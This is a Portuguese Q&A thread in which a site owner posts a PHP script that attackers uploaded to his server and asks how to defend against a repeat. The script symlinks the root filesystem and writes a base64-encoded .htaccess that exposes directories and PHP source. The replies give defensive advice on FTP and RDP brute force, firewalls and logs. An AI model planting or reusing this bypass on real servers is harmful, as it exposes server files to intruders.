# Como proteger site de ataque

Tags: php, segurança

Recentemente fui alvo de um ataque ao meu site, esse ataque desconfigurou o meu servidor, foi feito um upload e depois executaram esse script, vejam:

```
if (isset($_POST['red'])){ 

system('ln -s / red.txt'); 
$fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw'; 
$file = fopen(".htaccess","w+"); 
$write = fwrite ($file ,base64_decode($fvckem)); 
$red = symlink("/","red.txt"); 

$rt="

Bypassed Successfully"; 

echo "

Feito .. !

Servidor desconfigurado. 
$rt";

}
```

Pelo pouco conhecimento que tenho me pareceu um ataque pelo `.htaccess`, gostaria de saber, como posso me proteger de novos possíveis ataques?

Comment: você deixa quais portas abertas para se chegar ao seu servidor, tem terminal service, ssh, ftp, por algum lugar o hacker entrou, da uma olhada nos logs e ve se teve algum acesso desse tipo fora do horário normal, ou algum ip externo acessando o server.

Comment: Já de ante mão recomendo fazer um firewall que bloqueie qualquer acesso externo ao server, deixa acessível somente na rede local, e troque as senhas

Comment: Olá @SneepS NinjA acesso via ftp para envio das páginas para o servidor

Comment: então no ftp existem N maneiras de fazer força bruta ou dicionario, verifique se existe alguma implementação de segurança tipo 3 tentativas de erro então começa a dropar, no linux da p/ fazer via iptables

Comment: Outra dica importante é que a maquina cliente (que se conecta no server) pode ter algum trojan que pega as senhas, fica de olho, snifa tudo

Answer (score 2, accepted):

Vou falar sobre uma possível falha, teríamos que analisar melhor seu caso para saber se isso se enquadra.

Força bruta no terminal service:
http://www.pedropereira.net/terminal-services-rdp-brute-force/

Me assusta a microsoft não ter implementado uma segurança pode-se ficar forçando a porta 3389 de maneira sorrateira e temos muitos casos antigos desse tipo https://www.linkedin.com/grp/post/112919-89820598

A recomendaçao de especialistas http://blogs.technet.com/b/risco/archive/2012/03/16/201-necess-225-ria-a-instala-231-227-o-do-ms12-020-o-mais-r-225-pido-poss-237-vel.aspx

1. Não usar o serviço, porque não é seguro
2. Depois se ainda realmente for necessario então Bloquear porta 3389 do TCP no firewall do perímetro empresarial
3. Ative a Autenticação no Nível de Rede, o que não evitaria a força bruta, apenas dificultaria um pouco o ataque.

Veja um exemplo de tentativa de acesso na força bruta no windows server, isso foi recente. Pode perceber que são muitas tentativas com falhas e muito seguidas isso prova que temos uma tentativa de força bruta neste caso.

[image: inserir a descrição da imagem aqui]